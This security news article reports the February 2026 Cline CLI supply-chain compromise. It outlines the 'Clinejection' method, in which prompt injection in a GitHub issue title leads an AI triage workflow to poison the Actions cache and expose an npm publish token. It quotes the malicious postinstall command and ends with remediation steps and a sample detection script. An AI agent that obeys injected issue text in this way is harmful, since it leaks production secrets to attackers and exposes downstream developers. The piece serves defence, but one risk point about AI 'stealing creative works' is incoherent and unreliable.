On February 17, 2026, at 3:26 AM PT, an unauthorized actor used a compromised npm publish token to release version 2.3.0 of the popular AI-powered coding assistant Cline CLI. The update quietly added a single malicious line to package.json:
"postinstall": "npm install -g openclaw@latest"
This caused OpenClaw, the fast-rising open-source autonomous AI agent platform, to install automatically on any developer's machine that pulled the compromised version. The attack window lasted roughly eight hours (until maintainers revoked the token and yanked 2.3.0 around 11:30 AM PT). During that time, the package was downloaded approximately 4,000 times, per StepSecurity telemetry.
Cline maintainers quickly released 2.4.0, deprecated 2.3.0, revoked the stolen token, and switched npm publishing to OpenID Connect (OIDC) via GitHub Actions to prevent future token-based compromises. Importantly, the Cline VS Code extension and JetBrains plugin were unaffected; the breach was limited to the CLI package.
How the Attack Happened (Clinejection)
Security researcher Adnan Khan previously disclosed a vulnerability in Cline's GitHub Actions workflow, dubbed Clinejection (building on PromptPwnd techniques). The workflow used Claude to automatically triage incoming issues, granting the AI broad repository access and tools — including the ability to run arbitrary code in the default branch.
An attacker could exploit this via prompt injection in a GitHub issue title, tricking Claude into:
1. Filling the GitHub Actions cache with >10 GB of junk data (triggering LRU eviction).
2. Poisoning cache entries that matched keys used by the nightly release workflow.
3. Waiting for the nightly publish job to run (~2 AM UTC) and execute from the poisoned cache.
This gave code execution in the publish workflow, enough to steal the NPM_RELEASE_TOKEN (or NPM_TOKEN), which had full production publishing rights. The attacker then used that token to push the malicious 2.3.0 update.
Microsoft Threat Intelligence observed a "small but noticeable uptick" in OpenClaw installations on February 17, confirming the compromise had real impact.
Risk Assessment
Endor Labs researcher Henrik Plate noted the overall impact is low:
1. OpenClaw itself is not malicious (it's a legitimate, popular open-source project).
2. The postinstall only installs OpenClaw; no additional malicious behavior was observed.
3. No evidence the Gateway daemon (the part that could expose remote access) was started automatically.
Still, the incident is a serious wake-up call for AI supply chain security:
1. Developers are integrating AI agents such as OpenClaw into their workflows, but if the AI steals creative works, developers would be exposed to impersonation and data loss.
2. Automated triage workflows that involve AI hand their privileges to whoever injects a command into the system, because the injected command is treated as part of the request, which allows automated exploitation of production secrets.
3. npm is a high-value target; standard tokens are weak.
What Users Should Do Now
1. Check whether you installed cline@2.3.0 between 3:26 AM PT and roughly 11:30 AM PT on February 17, 2026: run npm list -g cline, or check package-lock.json / yarn.lock.
2. If yes, update to cline@2.4.0 and uninstall openclaw if it is unwanted: npm uninstall -g openclaw.
3. Check your environment for running openclaw instances (or processes it has invoked).
4. Rotate any npm tokens that may have been exposed, and enable OIDC (OpenID Connect) publishing from CI/CD for all packages that you maintain.
5. For teams: scan CI/CD logs for unusual interactions with issues and for poisoned caches associated with those requests.
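As an added example (not code from Cline, npm or the original report), the following Node.js functions automate step 1 for a parsed package-lock.json and flag install-time scripts that run a global npm install, like the postinstall line quoted at the top. The function names and sample inputs are constructed for illustration.

```javascript
// Added example (not Cline's or npm's code). Sample data below is constructed.
const BAD = { name: "cline", version: "2.3.0" };        // release named in the article
const HOOKS = ["preinstall", "install", "postinstall"]; // scripts npm runs at install time
const GLOBAL_INSTALL = /\bnpm\s+(?:install|i|add)\b[^&|;]*\s(?:-g|--global)\b/;

// Lockfile locations that pin the compromised release. Covers lockfileVersion 2/3
// ("packages", keyed by path) and version 1 (nested "dependencies").
function findCompromised(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = meta.name || path.split("node_modules/").pop();
    if (name === BAD.name && meta.version === BAD.version) hits.push(path || "(root)");
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (typeof meta !== "object" || meta === null) continue;
      const here = `${trail}node_modules/${name}`;
      const bad = name === BAD.name && meta.version === BAD.version;
      if (bad && !hits.includes(here)) hits.push(here);
      walk(meta.dependencies, `${here}/`);
    }
  };
  walk(lock.dependencies, "");
  return hits;
}

// Install-time hooks in a package.json that run a global npm install.
function riskyInstallHooks(pkg) {
  const scripts = pkg.scripts || {};
  return HOOKS.filter((hook) => GLOBAL_INSTALL.test(scripts[hook] || ""));
}

// Constructed inputs: a v3 lockfile with a nested pin, and the hook quoted above.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/example-tool/node_modules/cline": { version: "2.3.0" },
    "node_modules/other-dep": { version: "1.3.0" },
  },
};
const samplePkg = {
  scripts: { build: "tsc", postinstall: "npm install -g openclaw@latest" },
};

console.log("compromised pins:", findCompromised(sampleLock));
console.log("risky hooks:", riskyInstallHooks(samplePkg));
```

Pass it the JSON.parse output of your own package-lock.json and of any dependency's package.json; yarn.lock uses a different format and is not covered here.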
This is a textbook example of how AI-assisted development workflows can become attack surfaces and why trusted publishing (OIDC), least-privilege automation, and supply-chain attestations are no longer optional.
Source: The Hacker News